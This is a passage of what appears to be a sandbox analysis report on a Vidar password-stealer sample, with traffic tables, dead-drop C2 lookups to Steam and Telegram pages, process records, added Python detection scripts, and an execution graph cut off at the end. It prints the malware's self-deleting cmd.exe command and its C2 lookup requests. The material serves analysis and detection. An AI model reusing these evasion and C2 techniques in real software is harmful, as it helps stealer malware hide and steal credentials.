                                     Sep 15, 2024 18:30:06.276830912 CEST | 49719 | 443 | 192.168.2.12 | 188.245.87.202
                                     Sep 15, 2024 18:30:06.276920080 CEST | 49719 | 443 | 192.168.2.12 | 188.245.87.202
                                     Sep 15, 2024 18:30:06.276948929 CEST | 443 | 49719 | 188.245.87.202 | 192.168.2.12
                                     Sep 15, 2024 18:30:06.277506113 CEST | 49720 | 443 | 192.168.2.12 | 188.245.87.202
                                     Sep 15, 2024 18:30:06.277548075 CEST | 443 | 49720 | 188.245.87.202 | 192.168.2.12
                                     Sep 15, 2024 18:30:06.277621031 CEST | 49720 | 443 | 192.168.2.12 | 188.245.87.202
                                     Sep 15, 2024 18:30:06.277736902 CEST | 49720 | 443 | 192.168.2.12 | 188.245.87.202
                                     Sep 15, 2024 18:30:06.277779102 CEST | 443 | 49720 | 188.245.87.202 | 192.168.2.12
                                     Sep 15, 2024 18:30:06.277825117 CEST | 49720 | 443 | 192.168.2.12 | 188.245.87.202
                                     Sep 15, 2024 18:30:06.291809082 CEST | 49721 | 443 | 192.168.2.12 | 149.154.167.99
                                     Sep 15, 2024 18:30:06.291845083 CEST | 443 | 49721 | 149.154.167.99 | 192.168.2.12
                                     Sep 15, 2024 18:30:06.291908979 CEST | 49721 | 443 | 192.168.2.12 | 149.154.167.99
                                     Sep 15, 2024 18:30:06.292139053 CEST | 49721 | 443 | 192.168.2.12 | 149.154.167.99
                                     Sep 15, 2024 18:30:06.292152882 CEST | 443 | 49721 | 149.154.167.99 | 192.168.2.12
                                     Sep 15, 2024 18:30:06.920351982 CEST | 443 | 49721 | 149.154.167.99 | 192.168.2.12
                                     Sep 15, 2024 18:30:06.920496941 CEST | 49721 | 443 | 192.168.2.12 | 149.154.167.99
                                     Sep 15, 2024 18:30:06.927598000 CEST | 49721 | 443 | 192.168.2.12 | 149.154.167.99
                                     Sep 15, 2024 18:30:06.927623034 CEST | 443 | 49721 | 149.154.167.99 | 192.168.2.12
                                     Sep 15, 2024 18:30:06.927894115 CEST | 443 | 49721 | 149.154.167.99 | 192.168.2.12
                                     Sep 15, 2024 18:30:06.927961111 CEST | 49721 | 443 | 192.168.2.12 | 149.154.167.99
                                     Sep 15, 2024 18:30:06.928375006 CEST | 49721 | 443 | 192.168.2.12 | 149.154.167.99
                                     Sep 15, 2024 18:30:06.975398064 CEST | 443 | 49721 | 149.154.167.99 | 192.168.2.12
                                     Sep 15, 2024 18:30:07.170530081 CEST | 443 | 49721 | 149.154.167.99 | 192.168.2.12
                                     Sep 15, 2024 18:30:07.170557022 CEST | 443 | 49721 | 149.154.167.99 | 192.168.2.12
                                     Sep 15, 2024 18:30:07.170587063 CEST | 443 | 49721 | 149.154.167.99 | 192.168.2.12
                                     Sep 15, 2024 18:30:07.170609951 CEST | 49721 | 443 | 192.168.2.12 | 149.154.167.99
                                     Sep 15, 2024 18:30:07.170612097 CEST | 443 | 49721 | 149.154.167.99 | 192.168.2.12
                                     Sep 15, 2024 18:30:07.170670986 CEST | 49721 | 443 | 192.168.2.12 | 149.154.167.99
                                     Sep 15, 2024 18:30:07.170705080 CEST | 49721 | 443 | 192.168.2.12 | 149.154.167.99
                                     Sep 15, 2024 18:30:07.173254013 CEST | 49721 | 443 | 192.168.2.12 | 149.154.167.99
                                     Sep 15, 2024 18:30:07.173265934 CEST | 443 | 49721 | 149.154.167.99 | 192.168.2.12
                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Sep 15, 2024 18:29:57.728355885 CEST | 53089 | 53 | 192.168.2.12 | 1.1.1.1
                                     Sep 15, 2024 18:29:57.737616062 CEST | 53 | 53089 | 1.1.1.1 | 192.168.2.12
                                     Sep 15, 2024 18:30:06.280889034 CEST | 52652 | 53 | 192.168.2.12 | 1.1.1.1
                                     Sep 15, 2024 18:30:06.291100025 CEST | 53 | 52652 | 1.1.1.1 | 192.168.2.12
                                     Sep 15, 2024 18:30:08.098771095 CEST | 59643 | 53 | 192.168.2.12 | 1.1.1.1
                                     Sep 15, 2024 18:30:08.108323097 CEST | 53 | 59643 | 1.1.1.1 | 192.168.2.12
                                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                     Sep 15, 2024 18:29:57.728355885 CEST | 192.168.2.12 | 1.1.1.1 | 0xba99 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
                                     Sep 15, 2024 18:30:06.280889034 CEST | 192.168.2.12 | 1.1.1.1 | 0xc0ed | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
                                     Sep 15, 2024 18:30:08.098771095 CEST | 192.168.2.12 | 1.1.1.1 | 0xd26f | Standard query (0) | arpdabl.zapto.org | A (IP address) | IN (0x0001) | false
                                     Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                     Sep 15, 2024 18:29:57.737616062 CEST | 1.1.1.1 | 192.168.2.12 | 0xba99 | No error (0) | steamcommunity.com |  | 23.50.98.133 | A (IP address) | IN (0x0001) | false
                                     Sep 15, 2024 18:30:06.291100025 CEST | 1.1.1.1 | 192.168.2.12 | 0xc0ed | No error (0) | t.me |  | 149.154.167.99 | A (IP address) | IN (0x0001) | false
                                     Sep 15, 2024 18:30:08.108323097 CEST | 1.1.1.1 | 192.168.2.12 | 0xd26f | No error (0) | arpdabl.zapto.org |  | 0.0.0.0 | A (IP address) | IN (0x0001) | false
                                    • steamcommunity.com
                                    • t.me
                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     0 | 192.168.2.12 | 49717 | 23.50.98.133 | 443 | 6924 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     2024-09-15 16:29:59 UTC | 119 | OUT | GET /profiles/76561199747278259 HTTP/1.1
                                    Host: steamcommunity.com
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                     2024-09-15 16:29:59 UTC | 1870 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                    Cache-Control: no-cache
                                    Date: Sun, 15 Sep 2024 16:29:59 GMT
                                    Content-Length: 34740
                                    Connection: close
                                    Set-Cookie: sessionid=2e963e6cf61507d182db9691; Path=/; Secure; SameSite=None
                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                     2024-09-15 16:29:59 UTC | 14514 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                     2024-09-15 16:29:59 UTC | 10062 | IN | Data Raw: 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69
                                    Data Ascii: destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><di
                                     2024-09-15 16:29:59 UTC | 10164 | IN | Data Raw: 6d 6d 75 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45
                                    Data Ascii: mmunity.akamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARE


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     1 | 192.168.2.12 | 49721 | 149.154.167.99 | 443 | 6924 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     2024-09-15 16:30:06 UTC | 86 | OUT | GET /armad2a HTTP/1.1
                                    Host: t.me
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                     2024-09-15 16:30:07 UTC | 510 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Sun, 15 Sep 2024 16:30:07 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 9552
                                    Connection: close
                                    Set-Cookie: stel_ssid=4efd914e132e45a65a_1135532237225000423; expires=Mon, 16 Sep 2024 16:30:07 GMT; path=/; samesite=None; secure; HttpOnly
                                    Pragma: no-cache
                                    Cache-control: no-store
                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                    Strict-Transport-Security: max-age=35768000
                                     2024-09-15 16:30:07 UTC | 9552 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 72 6d 61 64 32 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e
                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @armad2a</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren
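The two sessions above show the sample process itself (PID 6924, not a browser) fetching a Steam profile page and a Telegram channel page with no User-Agent header. That is the shape of a dead-drop resolver lookup (ATT&CK T1102.001), where malware reads its C2 address from a page hosted on a legitimate service, so the destination domains and IPs are poor blocking keys and detection has to key on the request itself and on the requesting process. The Python below is an added example written for this report, not Joe Sandbox or Vidar code: it re-parses the two captured requests plus a constructed browser request to the same Steam profile URL and returns the indicators that fire on each. The browser control request, the browser image list and the path shapes (17-digit Steam64 ID, 5-32 character Telegram name) are assumptions for the example.

```python
"""Flag HTTP requests shaped like dead-drop-resolver lookups (ATT&CK T1102.001)."""
import re
from typing import Dict, List, Optional, Tuple

# Path shapes that identify a profile or channel page on services commonly used to
# host a C2 address. Assumptions for this example: Steam64 IDs are 17 digits,
# Telegram public names are 5-32 word characters.
DEAD_DROP_PATHS = {
    "steamcommunity.com": re.compile(r"^/profiles/\d{17}/?$"),
    "t.me": re.compile(r"^/[A-Za-z0-9_]{5,32}$"),
}

# Constructed allowlist of browser images; extend it from your own inventory.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "brave.exe", "opera.exe"}


def parse_request(raw: str) -> Dict[str, object]:
    """Split a raw HTTP/1.x request head into method, path, version and lowercase-named headers."""
    lines = [ln for ln in raw.splitlines() if ln.strip()]
    method, path, version = lines[0].split()
    headers: Dict[str, str] = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def image_name(process_path: str) -> str:
    """Lowercased basename of a Windows or POSIX process path."""
    return process_path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage_request(raw: str, process_path: Optional[str] = None) -> List[str]:
    """Return the indicators that fire on one request; an empty list means nothing fired."""
    req = parse_request(raw)
    headers = req["headers"]
    assert isinstance(headers, dict)
    host = headers.get("host", "").lower()
    findings: List[str] = []
    if "user-agent" not in headers:
        findings.append("no-user-agent")
    pattern = DEAD_DROP_PATHS.get(host)
    if req["method"] == "GET" and pattern is not None and pattern.match(str(req["path"])):
        findings.append(f"dead-drop-lookup:{host}{req['path']}")
    if process_path is not None and image_name(process_path) not in BROWSER_IMAGES:
        findings.append(f"non-browser-process:{image_name(process_path)}")
    return findings


def is_suspicious(findings: List[str]) -> bool:
    """A dead-drop URL plus at least one client anomaly; a browser with a User-Agent on the same URL is normal traffic."""
    hit_url = any(f.startswith("dead-drop-lookup:") for f in findings)
    odd_client = "no-user-agent" in findings or any(f.startswith("non-browser-process:") for f in findings)
    return hit_url and odd_client


def triage_capture(capture: List[Tuple[str, str, str]]) -> Dict[str, List[str]]:
    """(label, raw request, process path) triples -> {label: findings} for suspicious entries only."""
    out: Dict[str, List[str]] = {}
    for label, raw, process_path in capture:
        findings = triage_request(raw, process_path)
        if is_suspicious(findings):
            out[label] = findings
    return out


# Requests and process path as recorded in sessions 0 and 1 of this report.
SAMPLE_IMAGE = r"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe"
STEAM_REQUEST = """GET /profiles/76561199747278259 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
"""
TELEGRAM_REQUEST = """GET /armad2a HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
"""
# Constructed control: Firefox visiting the same profile page.
FIREFOX_IMAGE = r"C:\Program Files\Mozilla Firefox\firefox.exe"
BROWSER_REQUEST = """GET /profiles/76561199747278259 HTTP/1.1
Host: steamcommunity.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html
Referer: https://steamcommunity.com/
"""
CAPTURE = [
    ("steam", STEAM_REQUEST, SAMPLE_IMAGE),
    ("telegram", TELEGRAM_REQUEST, SAMPLE_IMAGE),
    ("browser", BROWSER_REQUEST, FIREFOX_IMAGE),
]

if __name__ == "__main__":
    for label, hits in triage_capture(CAPTURE).items():
        print(f"{label}: {', '.join(hits)}")
```

In production the raw request head comes from a proxy or TLS-inspection log and the process path from endpoint telemetry joined on source port and time, as the session table above does; the profile and channel names themselves should be recorded as indicators, because the same account is typically reused across samples while the C2 address it points to changes.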



                                    Target ID:0
                                    Start time:12:29:56
                                    Start date:15/09/2024
                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe"
                                    Imagebase:0x2f0000
                                    File size:70'144 bytes
                                    MD5 hash:5A4CCCCB90B0AAA3B248D4F0DDE38823
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:3
                                    Start time:12:30:07
                                    Start date:15/09/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exit
                                    Imagebase:0x1f0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:12:30:07
                                    Start date:15/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff704000000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:12:30:07
                                    Start date:15/09/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 10
                                    Imagebase:0xfe0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
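Target 3 above is the sample's clean-up step: a cmd.exe child that waits ten seconds (the timeout.exe in Target 5), deletes the parent's own executable and removes a working directory under C:\ProgramData. The delay matters because the parent's image file is locked until the parent exits. The Python below is an added example for this report, not Joe Sandbox or Vidar code: given process-creation events (image, PID, parent PID, command line), it flags a cmd.exe child whose command line deletes its parent's image and reports whether a delay idiom precedes the delete and which directories are removed alongside. The event records, the explorer.exe parent, the benign control event and every PID except the sample's 6924 (taken from the HTTP session table) are constructed for the example.

```python
"""Flag a cmd.exe child that deletes its parent's own executable after a delay."""
import re
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str
    command_line: str


@dataclass
class SelfDeletion:
    child_pid: int
    parent_pid: int
    parent_image: str
    delayed: bool
    removed_dirs: List[str] = field(default_factory=list)


# del/erase and rd/rmdir with any of their usual switches, followed by one quoted or
# bare path. Switch order differs between droppers, so switches are matched loosely.
_DEL_RE = re.compile(r'\b(?:del|erase)\b(?:\s+/[fqasp])*\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
_RD_RE = re.compile(r'\b(?:rd|rmdir)\b(?:\s+/[sq])*\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
# Delay idioms that give the parent time to exit so its image is no longer locked.
_DELAY_RE = re.compile(
    r"\b(?:timeout\s+(?:/t\s+)?\d+|ping\s+(?:-n\s+\d+\s+)?(?:127\.0\.0\.1|localhost))",
    re.IGNORECASE,
)


def _paths(regex: "re.Pattern[str]", command_line: str) -> List[str]:
    return [quoted or bare for quoted, bare in regex.findall(command_line)]


def deleted_files(command_line: str) -> List[str]:
    """Paths passed to del/erase anywhere in the command line."""
    return _paths(_DEL_RE, command_line)


def removed_dirs(command_line: str) -> List[str]:
    """Paths passed to rd/rmdir anywhere in the command line."""
    return _paths(_RD_RE, command_line)


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_self_deletions(events: List[ProcessEvent]) -> List[SelfDeletion]:
    """One record per cmd.exe child whose del target equals its parent's image path."""
    by_pid: Dict[int, ProcessEvent] = {e.pid: e for e in events}
    hits: List[SelfDeletion] = []
    for ev in events:
        if _basename(ev.image) != "cmd.exe":
            continue
        parent = by_pid.get(ev.ppid)
        if parent is None:
            continue
        targets = {p.lower() for p in deleted_files(ev.command_line)}
        if parent.image.lower() in targets:
            hits.append(SelfDeletion(
                child_pid=ev.pid,
                parent_pid=parent.pid,
                parent_image=parent.image,
                delayed=bool(_DELAY_RE.search(ev.command_line)),
                removed_dirs=removed_dirs(ev.command_line),
            ))
    return hits


SAMPLE_EXE = r"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe"
# Constructed event log; PID 6924 and the command lines are from this report.
SAMPLE_EVENTS = [
    ProcessEvent(4321, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(6924, 4321, SAMPLE_EXE, f'"{SAMPLE_EXE}"'),
    ProcessEvent(7100, 6924, r"C:\Windows\SysWOW64\cmd.exe",
                 r'"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q '
                 f'"{SAMPLE_EXE}" & rd /s /q "C:\\ProgramData\\AEGHIJEHJDHI" & exit'),
    ProcessEvent(7101, 7100, r"C:\Windows\SysWOW64\timeout.exe", "timeout /t 10"),
    # Benign control: a cleanup command launched from explorer.exe.
    ProcessEvent(7200, 4321, r"C:\Windows\System32\cmd.exe",
                 r'cmd.exe /c del /q "C:\Users\user\AppData\Local\Temp\old.log"'),
]

if __name__ == "__main__":
    for hit in find_self_deletions(SAMPLE_EVENTS):
        print(f"cmd.exe {hit.child_pid} deletes parent {hit.parent_pid} ({hit.parent_image}); "
              f"delayed={hit.delayed}; also removes {hit.removed_dirs}")
```

The comparison is on the full image path, so a second binary with the same name elsewhere does not match; the delay flag and the removed directories are reported separately so the rule can also surface the less common immediate `del` without a wait.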


                                      Execution Graph

                                      Execution Coverage:18%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:7.6%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:40
                                       execution_graph (rendered call graph; its node list was flattened by extraction and is cut off at the end of this section). Nodes and API calls recoverable from the graph, by function address:
                                       0x300630: CoCreateInstance, SysAllocString, _wtoi64, SysFreeString
                                       0x3075f0 -> 0x2f2180: one call into 0x2f2000 (17 API calls), then a chain of calls into 0x2f2000 (39 API calls each) at 0x2f2191 through 0x2f24fd
                                       0x3076e0: GetPEB; 0x307736: 20 API calls; 0x307922: LoadLibraryA (five calls); 0x307983 through 0x307a0b: GetProcAddress (seven calls)
                                       0x2ff810, 0x2ff8f0: lstrcpy; 0x2ff8a0, 0x2ff9a0: lstrlen, lstrcpy, lstrcat; 0x2ff940: 2 API calls; 0x2ff850
                                       0x2ffae0: GetProcessHeap, RtlAllocateHeap, GetUserNameA
                                       0x30766a: OpenEventA; 0x307680: CloseHandle; 0x30768f: OpenEventA; 0x3076aa: CreateEventA
                                       0x306510: two calls into 0x2ff8a0, then 0x2f2510 -> chain of calls into 0x2f2000 (39 API calls each) at 0x2f2521 through 0x2f32d7 (list truncated in the extracted page)
                                       0x306980 ... 0x306a15: CreateDirectoryA; 0x306b21, 0x306b3b: InternetOpenA; 0x300420: GetWindowsDirectoryA; 0x2f5bb0: 41 API calls; 0x301400: CreateToolhelp32Snapshot, Process32First
                                       0x2f2117, 0x2f20a6: 11 API calls each
15608->15609 15610 2f32ed 15609->15610 15611 2f2000 39 API calls 15610->15611 15612 2f3303 15611->15612 15613 2f2000 39 API calls 15612->15613 15614 2f3319 15613->15614 15615 2f2000 39 API calls 15614->15615 15616 2f332f 15615->15616 15617 2f2000 39 API calls 15616->15617 15618 2f3345 15617->15618 15619 2f2000 39 API calls 15618->15619 15620 2f335e 15619->15620 15621 2f2000 39 API calls 15620->15621 15622 2f3374 15621->15622 15623 2f2000 39 API calls 15622->15623 15624 2f338a 15623->15624 15625 2f2000 39 API calls 15624->15625 15626 2f33a0 15625->15626 15627 2f2000 39 API calls 15626->15627 15628 2f33b6 15627->15628 15629 2f2000 39 API calls 15628->15629 15630 2f33cc 15629->15630 15631 2f2000 39 API calls 15630->15631 15632 2f33e5 15631->15632 15633 2f2000 39 API calls 15632->15633 15634 2f33fb 15633->15634 15635 2f2000 39 API calls 15634->15635 15636 2f3411 15635->15636 15637 2f2000 39 API calls 15636->15637 15638 2f3427 15637->15638 15639 2f2000 39 API calls 15638->15639 15640 2f343d 15639->15640 15641 2f2000 39 API calls 15640->15641 15642 2f3453 15641->15642 15643 2f2000 39 API calls 15642->15643 15644 2f346c 15643->15644 15645 2f2000 39 API calls 15644->15645 15646 2f3482 15645->15646 15647 2f2000 39 API calls 15646->15647 15648 2f3498 15647->15648 15649 2f2000 39 API calls 15648->15649 15650 2f34ae 15649->15650 15651 2f2000 39 API calls 15650->15651 15652 2f34c4 15651->15652 15653 2f2000 39 API calls 15652->15653 15654 2f34da 15653->15654 15655 2f2000 39 API calls 15654->15655 15656 2f34f3 15655->15656 15657 2f2000 39 API calls 15656->15657 15658 2f3509 15657->15658 15659 2f2000 39 API calls 15658->15659 15660 2f351f 15659->15660 15661 2f2000 39 API calls 15660->15661 15662 2f3535 15661->15662 15663 2f2000 39 API calls 15662->15663 15664 2f354b 15663->15664 15665 2f2000 39 API calls 15664->15665 15666 2f3561 15665->15666 15667 2f2000 39 API calls 15666->15667 15668 2f357a 15667->15668 15669 2f2000 39 API calls 15668->15669 15670 2f3590 15669->15670 15671 
